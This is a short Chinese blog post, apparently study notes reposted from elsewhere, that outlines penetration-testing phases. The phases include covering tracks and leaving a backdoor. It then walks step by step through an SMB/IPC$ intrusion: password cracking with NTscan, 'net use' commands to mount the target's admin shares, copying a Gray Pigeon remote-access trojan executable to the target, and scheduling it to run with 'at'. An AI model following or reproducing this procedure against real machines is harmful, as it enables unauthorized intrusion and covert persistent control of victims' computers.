(更新时间)2021年4月25日网络安全渗透测试-白红宇的个人博客

(更新时间)2021年4月25日网络安全渗透测试

发布日期：2021-06-29 15:15:54 浏览次数：2 分类：技术文章

本文共 583 字，大约阅读时间需要 1 分钟。

一：测试步骤

0.授权

1.信息收集

nslookup whois

2.扫描

namp=ip范围端口 80（IIS，apache，什么网站）scanport

高级扫描：如IIS漏洞2003-IIS6.0 2008IIS7.0

扫描网站漏洞（）

3.利用

4.提权（shell环境、桌面环境、最高权限）

5.灭迹

6.留后门

7.渗透测试报告

二：具体流程

1.scanport扫描445端口

2.利用IPC$：

进行破解：NTscan

3.相关命令行

=====================================net use f: \\10.1.1.2\share 密码 /user:用户net use f: /delnet use * /delnet use f: \\10.1.1.2\c$ 密码 /user:用户net use  \\10.1.1.2\ipc$ 密码 /user:用户==========================================

4.制作

利用光盘上的灰鸽子软件

5.植入（留后门）

copy d:\heihei.exe \10.1.1.2\c$

6.设置计划任务自动执行：

net time \10.1.1.2

at \10.1.1.2 11:11 “c:\heihei.exe”

7.等待客户机上线

转载地址：https://codeboy.blog.csdn.net/article/details/116126934 如侵犯您的版权，请留言回复原文章的地址，我们会给您删除此文章，给您带来不便请您谅解！

上一篇：(更新时间)2021年4月27日网络安全扫描与爆破

下一篇：(更新时间)2021年4月24日网络安全 PKI

发表评论

关于作者

喝酒易醉，品茶养心，人生如梦，品茶悟道，何以解忧？唯有杜康！

-- 愿君每日到此一游！